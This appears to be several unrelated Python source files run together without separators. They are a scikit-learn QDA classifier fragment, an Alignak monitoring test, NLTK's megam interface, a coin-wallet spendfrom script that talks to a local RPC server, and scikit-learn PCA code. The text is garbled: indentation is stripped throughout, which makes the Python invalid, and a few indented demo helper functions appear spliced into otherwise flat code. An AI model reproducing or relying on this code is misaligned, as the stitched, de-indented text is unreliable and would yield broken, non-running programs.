Target values (integers)
store_covariances : boolean
If True the covariance matrices are computed and stored in the
self.covariances_ attribute.
"""
X = np.asarray(X)
y = np.asarray(y)
if X.ndim != 2:
raise ValueError('X must be a 2D array')
if X.shape[0] != y.shape[0]:
raise ValueError(
'Incompatible shapes: X has %s samples, while y '
'has %s' % (X.shape[0], y.shape[0]))
if y.dtype.char.lower() not in ('b', 'h', 'i'):
# We need integer values to be able to use
# ndimage.measurements and np.bincount on numpy >= 2.0.
# We currently support (u)int8, (u)int16 and (u)int32.
# Note that versions of scipy >= 0.8 can also accept
# (u)int64. We however don't support it for backwards
# compatibility.
y = y.astype(np.int32)
n_samples, n_features = X.shape
classes = np.unique(y)
n_classes = classes.size
if n_classes < 2:
raise ValueError('y has less than 2 classes')
classes_indices = [(y == c).ravel() for c in classes]
if self.priors is None:
counts = np.array(ndimage.measurements.sum(
np.ones(n_samples, dtype=y.dtype), y, index=classes))
self.priors_ = counts / float(n_samples)
else:
self.priors_ = self.priors
cov = None
if store_covariances:
cov = []
means = []
scalings = []
rotations = []
for group_indices in classes_indices:
Xg = X[group_indices, :]
meang = Xg.mean(0)
means.append(meang)
Xgc = Xg - meang
# Xgc = U * S * V.T
U, S, Vt = np.linalg.svd(Xgc, full_matrices=False)
rank = np.sum(S > tol)
if rank < n_features:
warnings.warn("Variables are collinear")
S2 = (S ** 2) / (len(Xg) - 1)
if store_covariances:
# cov = V * (S^2 / (n-1)) * V.T
cov.append(np.dot(S2 * Vt.T, Vt))
scalings.append(S2)
rotations.append(Vt.T)
if store_covariances:
self.covariances_ = cov
self.means_ = np.asarray(means)
self.scalings = np.asarray(scalings)
self.rotations = rotations
self.classes = classes
return self
def decision_function(self, X):
"""Apply decision function to an array of samples.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples (test vectors).
Returns
-------
C : array, shape = [n_samples, n_classes]
Decision function values related to each class, per sample.
"""
X = np.asarray(X)
norm2 = []
for i in range(len(self.classes)):
R = self.rotations[i]
S = self.scalings[i]
Xm = X - self.means_[i]
X2 = np.dot(Xm, R * (S ** (-0.5)))
norm2.append(np.sum(X2 ** 2, 1))
norm2 = np.array(norm2).T # shape = [len(X), n_classes]
return (-0.5 * (norm2 + np.sum(np.log(self.scalings), 1))
+ np.log(self.priors_))
def predict(self, X):
"""Perform classification on an array of test vectors X.
The predicted class C for each sample in X is returned.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array, shape = [n_samples]
"""
d = self.decision_function(X)
y_pred = self.classes[d.argmax(1)]
return y_pred
def predict_proba(self, X):
"""Return posterior probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior probabilities of classification per class.
"""
values = self.decision_function(X)
# compute the likelihood of the underlying gaussian models
# up to a multiplicative constant.
likelihood = np.exp(values - values.min(axis=1)[:, np.newaxis])
# compute posterior probabilities
return likelihood / likelihood.sum(axis=1)[:, np.newaxis]
def predict_log_proba(self, X):
"""Return posterior log-probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior log-probabilities of classification per class.
"""
# XXX : can do better to avoid precision overflows
probas_ = self.predict_proba(X)
return np.log(probas_)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see .
#
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Copyright (C) 2009-2014:
# Jean Gabes, dummy@email.com
# Hartmut Goebel, dummy@email.com
# Grégory Starck, dummy@email.com
# Zoran Zaric, dummy@email.com
# Sebastien Coavoux, dummy@email.com
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see .
#
# This file is used to test reading and processing of config files
#
from alignak_test import *
class TestConfig(AlignakTest):
def setUp(self):
self.setup_with_file('etc/alignak_resultmodulation.cfg')
def get_svc(self):
return self.sched.services.find_srv_by_name_and_hostname("test_host_0", "test_ok_0")
def get_host(self):
return self.sched.hosts.find_by_name("test_host_0")
def get_router(self):
return self.sched.hosts.find_by_name("test_router_0")
def test_service_resultmodulation(self):
svc = self.get_svc()
host = self.get_host()
router = self.get_router()
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0'],])
self.assertEqual('UP', host.state)
self.assertEqual('HARD', host.state_type)
# This service has a result modulation, so CRITICALs are in fact
# WARNINGs. Even with some CRITICAL (2) results, it must be WARNING
self.assertEqual('WARNING', svc.state)
# If we remove the resultmodulations, we should get the classic behavior
svc.resultmodulations = []
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('CRITICAL', svc.state)
# Now check the inherited case:
# resultmodulation is an implicitly inherited parameter; the router
# defines it, but test_router_0/test_ok_0 does not, so this service is also impacted
svc2 = self.sched.services.find_srv_by_name_and_hostname("test_router_0", "test_ok_0")
self.assertEqual(router.resultmodulations, svc2.resultmodulations)
self.scheduler_loop(2, [[svc2, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('WARNING', svc2.state)
if __name__ == '__main__':
unittest.main()
# Natural Language Toolkit: Interface to Megam Classifier
#
# Copyright (C) 2001-2010 NLTK Project
# Author: Edward Loper dummy@email.com
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
#
# $Id: naivebayes.py 2063 2004-07-17 21:02:24Z edloper $
"""
A set of functions used to interface with the external U{megam
<http://www.cs.utah.edu/~hal/megam/>} maxent optimization package.
Before C{megam} can be used, you should tell NLTK where it can find
the C{megam} binary, using the L{config_megam()} function. Typical
usage:
>>> import nltk
>>> nltk.config_megam('.../path/to/megam')
>>> classifier = nltk.MaxentClassifier.train(corpus, 'megam')
"""
__docformat__ = 'epytext en'
import os
import os.path
import subprocess
from nltk.internals import find_binary
try:
import numpy
except ImportError:
numpy = None
######################################################################
#{ Configuration
######################################################################
_megam_bin = None
def config_megam(bin=None):
"""
Configure NLTK's interface to the C{megam} maxent optimization
package.
@param bin: The full path to the C{megam} binary. If not specified,
then nltk will search the system for a C{megam} binary; and if
one is not found, it will raise a C{LookupError} exception.
@type bin: C{string}
"""
global _megam_bin
_megam_bin = find_binary(
'megam', bin,
env_vars=['MEGAM', 'MEGAMHOME'],
binary_names=['megam.opt', 'megam', 'megam_686', 'megam_i686.opt'],
url='http://www.cs.utah.edu/~hal/megam/')
######################################################################
#{ Megam Interface Functions
######################################################################
def write_megam_file(train_toks, encoding, stream,
bernoulli=True, explicit=True):
"""
Generate an input file for C{megam} based on the given corpus of
classified tokens.
@type train_toks: C{list} of C{tuples} of (C{dict}, C{str})
@param train_toks: Training data, represented as a list of
pairs, the first member of which is a feature dictionary,
and the second of which is a classification label.
@type encoding: L{MaxentFeatureEncodingI}
@param encoding: A feature encoding, used to convert featuresets
into feature vectors.
@type stream: C{stream}
@param stream: The stream to which the megam input file should be
written.
@param bernoulli: If true, then use the 'bernoulli' format. I.e.,
all joint features have binary values, and are listed iff they
are true. Otherwise, list feature values explicitly. If
C{bernoulli=False}, then you must call C{megam} with the
C{-fvals} option.
@param explicit: If true, then use the 'explicit' format. I.e.,
list the features that would fire for any of the possible
labels, for each token. If C{explicit=True}, then you must
call C{megam} with the C{-explicit} option.
"""
# Look up the set of labels.
labels = encoding.labels()
labelnum = dict([(label, i) for (i, label) in enumerate(labels)])
# Write the file, which contains one line per instance.
for featureset, label in train_toks:
# First, the instance number.
stream.write('%d' % labelnum[label])
# For implicit file formats, just list the features that fire
# for this instance's actual label.
if not explicit:
_write_megam_features(encoding.encode(featureset, label),
stream, bernoulli)
# For explicit formats, list the features that would fire for
# any of the possible labels.
else:
for l in labels:
stream.write(' #')
_write_megam_features(encoding.encode(featureset, l),
stream, bernoulli)
# End of the instance.
stream.write('\n')
def parse_megam_weights(s, features_count, explicit=True):
"""
Given the stdout output generated by C{megam} when training a
model, return a C{numpy} array containing the corresponding weight
vector. This function does not currently handle bias features.
"""
if numpy is None:
raise ValueError('This function requires that numpy be installed')
assert explicit, 'non-explicit not supported yet'
lines = s.strip().split('\n')
weights = numpy.zeros(features_count, 'd')
for line in lines:
if line.strip():
fid, weight = line.split()
weights[int(fid)] = float(weight)
return weights
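# Illustrative example (toy values, not real megam output; requires numpy):
# each stdout line is "<feature-id> <weight>", so two features parse into a
# length-2 weight vector.
def _demo_parse_weights():
    toy_stdout = '0 0.5\n1 -0.25\n'
    weights = parse_megam_weights(toy_stdout, 2)
    assert list(weights) == [0.5, -0.25]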
def _write_megam_features(vector, stream, bernoulli):
if not vector:
raise ValueError('MEGAM classifier requires the use of an '
'always-on feature.')
for (fid, fval) in vector:
if bernoulli:
if fval == 1:
stream.write(' %s' % fid)
elif fval != 0:
raise ValueError('If bernoulli=True, then all'
'features must be binary.')
else:
stream.write(' %s %s' % (fid, fval))
def call_megam(args):
"""
Call the C{megam} binary with the given arguments.
"""
if isinstance(args, basestring):
raise TypeError('args should be a list of strings')
if _megam_bin is None:
config_megam()
# Call megam via a subprocess
cmd = [_megam_bin] + args
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
# Check the return code.
if p.returncode != 0:
print
print stderr
raise OSError('megam command failed!')
return stdout
#!/usr/bin/env python
#
# Use the raw transactions API to spend ones received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a oned or One-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE = Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the One Core data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/OneCore/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "OneCore")
return os.path.expanduser("~/.onecore")
def read_bitcoin_config(dbdir):
"""Read the one.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() + "\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "one.conf"))))
return dict(config_parser.items("all"))
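# Illustrative usage sketch: given a directory holding a sectionless one.conf,
# read_bitcoin_config returns its settings as a dict; FakeSecHead supplies the
# "[all]" section header that SafeConfigParser requires.
def _demo_read_config():
    import tempfile
    dbdir = tempfile.mkdtemp()
    with open(os.path.join(dbdir, 'one.conf'), 'w') as f:
        f.write('rpcuser=alice\nrpcpassword=secret # inline comments are stripped\n')
    settings = read_bitcoin_config(dbdir)
    assert settings['rpcuser'] == 'alice' and settings['rpcpassword'] == 'secret'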
def connect_JSON(config):
"""Connect to a One Core JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 19998 if testnet else 9876
connect = "http://%s:%s@127.0.0.1:%s" % (config['rpcuser'], config['rpcpassword'], config['rpcport'])  # oned assumed to run on localhost, per the header comment
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the oned we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(oned):
info = oned.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
oned.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = oned.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(oned):
address_summary = dict()
address_to_account = dict()
for info in oned.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = oned.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = oned.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-one-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
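# Illustrative example (toy values): the greedy selection above walks the
# unspent list in order until the target is covered, returning the inputs
# chosen and the change left over.
def _demo_select_coins():
    unspent = [
        {'txid': 'aa', 'vout': 0, 'amount': Decimal('1.0')},
        {'txid': 'bb', 'vout': 1, 'amount': Decimal('0.5')},
    ]
    outputs, change = select_coins(Decimal('1.2'), unspent)
    assert [o['txid'] for o in outputs] == ['aa', 'bb']
    assert change == Decimal('0.3')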
def create_tx(oned, fromaddresses, toaddress, amount, fee):
all_coins = list_available(oned)
total_available = Decimal("0.0")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n" % (total_available, needed))
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to oned.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = oned.createrawtransaction(inputs, outputs)
signed_rawtx = oned.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(oned, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = oned.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(oned, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = oned.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(oned, txinfo)
total_out = compute_amount_out(txinfo)
actual_fee = total_in - total_out
if actual_fee > max_fee:
raise FeeError("Rejecting transaction, unreasonable fee of "+str(actual_fee))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and actual_fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and actual_fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write(str(err)+"\n")
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get ones from")
parser.add_option("--to", dest="to", default=None,
help="address to send ones to")
parser.add_option("--amount", dest="amount", default=None,
help="amount to send")
parser.add_option("--fee", dest="fee", default="0.0",
help="fee to include")
parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
help="location of one.conf file with RPC username/password (default: %default)")
parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
help="Use the test network")
parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
help="Don't broadcast the transaction, just create and print the transaction data")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
oned = connect_JSON(config)
if options.amount is None:
address_summary = list_available(oned)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
else:
print("%s %.8f %s"%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
while unlock_wallet(oned) == False:
pass # Keep asking for passphrase until they get it right
txdata = create_tx(oned, options.fromaddresses.split(","), options.to, amount, fee)
sanity_test_fee(oned, txdata, amount*Decimal("0.01"))
if options.dry_run:
print(txdata)
else:
txid = oned.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
""" Principal Component Analysis
"""
# Author: Alexandre Gramfort dummy@email.com
# Olivier Grisel dummy@email.com
# Mathieu Blondel dummy@email.com
# Denis A. Engemann dummy@email.com
#
# License: BSD 3 clause
from math import log, sqrt
import warnings
import numpy as np
from scipy import linalg
from scipy.special import gammaln
from ..base import BaseEstimator, TransformerMixin
from ..utils import array2d, check_random_state, as_float_array
from ..utils import atleast2d_or_csr
from ..utils.extmath import fast_logdet, safe_sparse_dot, randomized_svd, \
fast_dot
def _assess_dimension_(spectrum, rank, n_samples, n_features):
"""Compute the likelihood of a rank ``rank`` dataset
The dataset is assumed to be embedded in Gaussian noise of shape (n,
dimf) having spectrum ``spectrum``.
Parameters
----------
spectrum: array of shape (n)
data spectrum
rank: int,
tested rank value
n_samples: int,
number of samples
dim: int,
embedding/empirical dimension
Returns
-------
ll: float,
The log-likelihood
Notes
-----
This implements the method of `Thomas P. Minka:
Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`
"""
if rank > len(spectrum):
raise ValueError("The tested rank cannot exceed the rank of the"
" dataset")
pu = -rank * log(2.)
for i in range(rank):
pu += (gammaln((n_features - i) / 2.)
- log(np.pi) * (n_features - i) / 2.)
pl = np.sum(np.log(spectrum[:rank]))
pl = -pl * n_samples / 2.
if rank == n_features:
pv = 0
v = 1
else:
v = np.sum(spectrum[rank:]) / (n_features - rank)
pv = -np.log(v) * n_samples * (n_features - rank) / 2.
m = n_features * rank - rank * (rank + 1.) / 2.
pp = log(2. * np.pi) * (m + rank + 1.) / 2.
pa = 0.
spectrum_ = spectrum.copy()
spectrum_[rank:n_features] = v
for i in range(rank):
for j in range(i + 1, len(spectrum)):
pa += log((spectrum[i] - spectrum[j]) *
(1. / spectrum_[j] - 1. / spectrum_[i])) + log(n_samples)
ll = pu + pl + pv + pp - pa / 2. - rank * log(n_samples) / 2.
return ll
def _infer_dimension_(spectrum, n_samples, n_features):
"""Infers the dimension of a dataset of shape (n_samples, n_features)
The dataset is described by its spectrum `spectrum`.
"""
n_spectrum = len(spectrum)
ll = np.empty(n_spectrum)
for rank in range(n_spectrum):
ll[rank] = _assess_dimension_(spectrum, rank, n_samples, n_features)
return ll.argmax()
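# Illustrative sketch (toy data): for samples drawn from a single dominant
# direction plus small isotropic noise, the Minka likelihood above should
# typically select rank 1.
def _demo_infer_dimension():
    rng = np.random.RandomState(0)
    X = np.dot(rng.randn(100, 1), rng.randn(1, 5)) + 0.01 * rng.randn(100, 5)
    X = X - X.mean(axis=0)
    spectrum = np.linalg.svd(X, compute_uv=False) ** 2 / X.shape[0]
    return _infer_dimension_(spectrum, 100, 5)  # expected: 1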
class PCA(BaseEstimator, TransformerMixin):
"""Principal component analysis (PCA)
Linear dimensionality reduction using Singular Value Decomposition of the
data and keeping only the most significant singular vectors to project the
data to a lower dimensional space.
This implementation uses the scipy.linalg implementation of the singular
value decomposition. It only works for dense arrays and is not scalable to
large dimensional data.
The time complexity of this implementation is ``O(n ** 3)`` assuming
n ~ n_samples ~ n_features.
Parameters
----------
n_components : int, None or string
Number of components to keep.
if n_components is not set all components are kept::
n_components == min(n_samples, n_features)
if n_components == 'mle', Minka's MLE is used to guess the dimension
if ``0 < n_components < 1``, select the number of components such that
the amount of variance that needs to be explained is greater than the
percentage specified by n_components
copy : bool
If False, data passed to fit are overwritten and running
fit(X).transform(X) will not yield the expected results,
use fit_transform(X) instead.
whiten : bool, optional
When True (False by default) the `components_` vectors are divided
by n_samples times singular values to ensure uncorrelated outputs
with unit component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometime
improve the predictive accuracy of the downstream estimators by
making there data respect some hard-wired assumptions.
Attributes
----------
`components_` : array, [n_components, n_features]
Components with maximum variance.
`explained_variance_ratio_` : array, [n_components]
Percentage of variance explained by each of the selected components.
If n_components is not set then all components are stored and the sum
of explained variances is equal to 1.0
`n_components_` : int
The estimated number of components. Relevant when n_components is set
to 'mle' or a number between 0 and 1 to select using explained
variance.
Notes
-----
For n_components='mle', this class uses the method of `Thomas P. Minka:
Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`
Due to implementation subtleties of the Singular Value Decomposition (SVD),
which is used in this implementation, running fit twice on the same matrix
can lead to principal components with signs flipped (change in direction).
For this reason, it is important to always use the same estimator object to
transform data in a consistent fashion.
Examples
--------
>>> import numpy as np
>>> from sklearn.decomposition import PCA
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> pca = PCA(n_components=2)
>>> pca.fit(X)
PCA(copy=True, n_components=2, whiten=False)
>>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS
[ 0.99244... 0.00755...]
See also
--------
ProbabilisticPCA
RandomizedPCA
KernelPCA
SparsePCA
TruncatedSVD
"""
def __init__(self, n_components=None, copy=True, whiten=False):
self.n_components = n_components
self.copy = copy
self.whiten = whiten
def fit(self, X, y=None):
"""Fit the model with X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
self._fit(X)
return self
def fit_transform(self, X, y=None):
"""Fit the model with X and apply the dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
U, S, V = self._fit(X)
U = U[:, :self.n_components_]
if self.whiten:
# X_new = X * V / S * sqrt(n_samples) = U * sqrt(n_samples)
U *= sqrt(X.shape[0])
else:
# X_new = X * V = U * S * V^T * V = U * S
U *= S[:self.n_components_]
return U
def _fit(self, X):
""" Fit the model on X
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
U, s, V : ndarrays
The SVD of the input data, copied and centered when
requested.
"""
X = array2d(X)
n_samples, n_features = X.shape
X = as_float_array(X, copy=self.copy)
# Center data
self.mean_ = np.mean(X, axis=0)
X -= self.mean_
U, S, V = linalg.svd(X, full_matrices=False)
self.explained_variance_ = (S ** 2) / n_samples
self.explained_variance_ratio_ = (self.explained_variance_ /
self.explained_variance_.sum())
if self.whiten:
self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)
else:
self.components_ = V
n_components = self.n_components
if n_components is None:
n_components = n_features
elif n_components == 'mle':
if n_samples < n_features:
raise ValueError("n_components='mle' is only supported "
"if n_samples >= n_features")
n_components = _infer_dimension_(self.explained_variance_,
n_samples, n_features)
if 0 < n_components < 1.0:
# number of components for which the cumulated explained variance
# percentage is superior to the desired threshold
ratio_cumsum = self.explained_variance_ratio_.cumsum()
n_components = np.sum(ratio_cumsum < n_components) + 1
self.components_ = self.components_[:n_components, :]
self.explained_variance_ = \
self.explained_variance_[:n_components]
self.explained_variance_ratio_ = \
self.explained_variance_ratio_[:n_components]
self.n_components_ = n_components
return (U, S, V)
def transform(self, X):
"""Apply the dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
X = array2d(X)
if self.mean_ is not None:
X = X - self.mean_
X_transformed = fast_dot(X, self.components_.T)
return X_transformed
def inverse_transform(self, X):
"""Transform data back to its original space, i.e.,
return an input X_original whose transform would be X
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data, where n_samples is the number of samples
and n_components is the number of components.
Returns
-------
X_original array-like, shape (n_samples, n_features)
Notes
-----
If whitening is enabled, inverse_transform does not compute the
exact inverse operation as transform.
"""
return fast_dot(X, self.components_) + self.mean_
class ProbabilisticPCA(PCA):
"""Additional layer on top of PCA that adds a probabilistic evaluation"""
__doc__ += PCA.__doc__
def fit(self, X, y=None, homoscedastic=True):
"""Additionally to PCA.fit, learns a covariance model
Parameters
----------
X : array of shape(n_samples, n_features)
The data to fit
homoscedastic : bool, optional,
If True, average variance across remaining dimensions
"""
PCA.fit(self, X)
n_samples, n_features = X.shape
self._dim = n_features
Xr = X - self.mean_
Xr -= np.dot(np.dot(Xr, self.components_.T), self.components_)
n_components = self.n_components
if n_components is None:
n_components = n_features
# Make the low rank part of the estimated covariance
self.covariance_ = np.dot(self.components_[:n_components].T *
self.explained_variance_[:n_components],
self.components_[:n_components])
if n_features == n_components:
delta = 0.
elif homoscedastic:
delta = (Xr ** 2).sum() / (n_samples * n_features)
else:
delta = (Xr ** 2).mean(axis=0) / (n_features - n_components)
# Add delta to the diagonal without extra allocation
self.covariance_.flat[::n_features + 1] += delta
return self
def score(self, X, y=None):
"""Return a score associated with new data
Parameters
----------
X: array of shape(n_samples, n_features)
The data to test
Returns
-------
ll: array of shape (n_samples),
log-likelihood of each row of X under the current model
"""
Xr = X - self.mean_
n_features = X.shape[1]
log_like = np.zeros(X.shape[0])
self.precision_ = linalg.inv(self.covariance_)
log_like = -.5 * (Xr * (np.dot(Xr, self.precision_))).sum(axis=1)
log_like -= .5 * (fast_logdet(self.covariance_)
+ n_features * log(2. * np.pi))
return log_like
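# Illustrative usage sketch for the PCA class above: with whiten=False and all
# components kept, components_ is a square orthonormal matrix, so
# inverse_transform(transform(X)) recovers X exactly.
def _demo_pca_roundtrip():
    rng = np.random.RandomState(0)
    X = rng.randn(10, 3)
    pca = PCA(n_components=3).fit(X)
    assert np.allclose(X, pca.inverse_transform(pca.transform(X)))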
class RandomizedPCA(BaseEstimator, TransformerMixin):
"""Principal component analysis (PCA) using randomized SVD
Linear dimensionality reduction using approximated Singular Value
Decomposition of the data and keeping only the most significant
singular vectors to project the data to a lower dimensional space.
Parameters
----------
n_components : int, optional
Maximum number of components to keep. When not given or None, this
is set to n_features (the second dimension of the training data).
copy : bool
If False, data passed to fit are overwritten and running
fit(X).transform(X) will not yield the expected results,
use fit_transform(X) instead.
iterated_power : int, optional
Number of iterations for the power method. 3 by default.
whiten : bool, optional
When True (False by default) the `components_` vectors are divided
by the singular values to ensure uncorrelated outputs with unit
component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometime
improve the predictive accuracy of the downstream estimators by
making their data respect some hard-wired assumptions.
random_state : int or RandomState instance or None (default)
Pseudo Random Number generator seed control. If None, use the
numpy.random singleton.
Attributes
----------
`components_` : array, [n_components, n_features]
Components with maximum variance.
`explained_variance_ratio_` : array, [n_components]
Percentage of variance explained by each of the selected components.
If n_components is not set then all components are stored and the sum
of explained variances is equal to 1.0
Examples
--------
>>> import numpy as np
>>> from sklearn.decomposition import RandomizedPCA
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> pca = RandomizedPCA(n_components=2)
>>> pca.fit(X) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
RandomizedPCA(copy=True, iterated_power=3, n_components=2,
random_state=None, whiten=False)
>>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS
[ 0.99244... 0.00755...]
See also
--------
PCA
ProbabilisticPCA
TruncatedSVD
References
----------
.. [Halko2009] `Finding structure with randomness: Stochastic algorithms
for constructing approximate matrix decompositions Halko, et al., 2009
(arXiv:909)`
.. [MRT] `A randomized algorithm for the decomposition of matrices
Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert`
Notes
-----
This class supports sparse matrix input for backward compatibility, but
actually computes a truncated SVD instead of a PCA in that case (i.e. no
centering is performed). This support is deprecated; use the class
TruncatedSVD for sparse matrix support.
"""
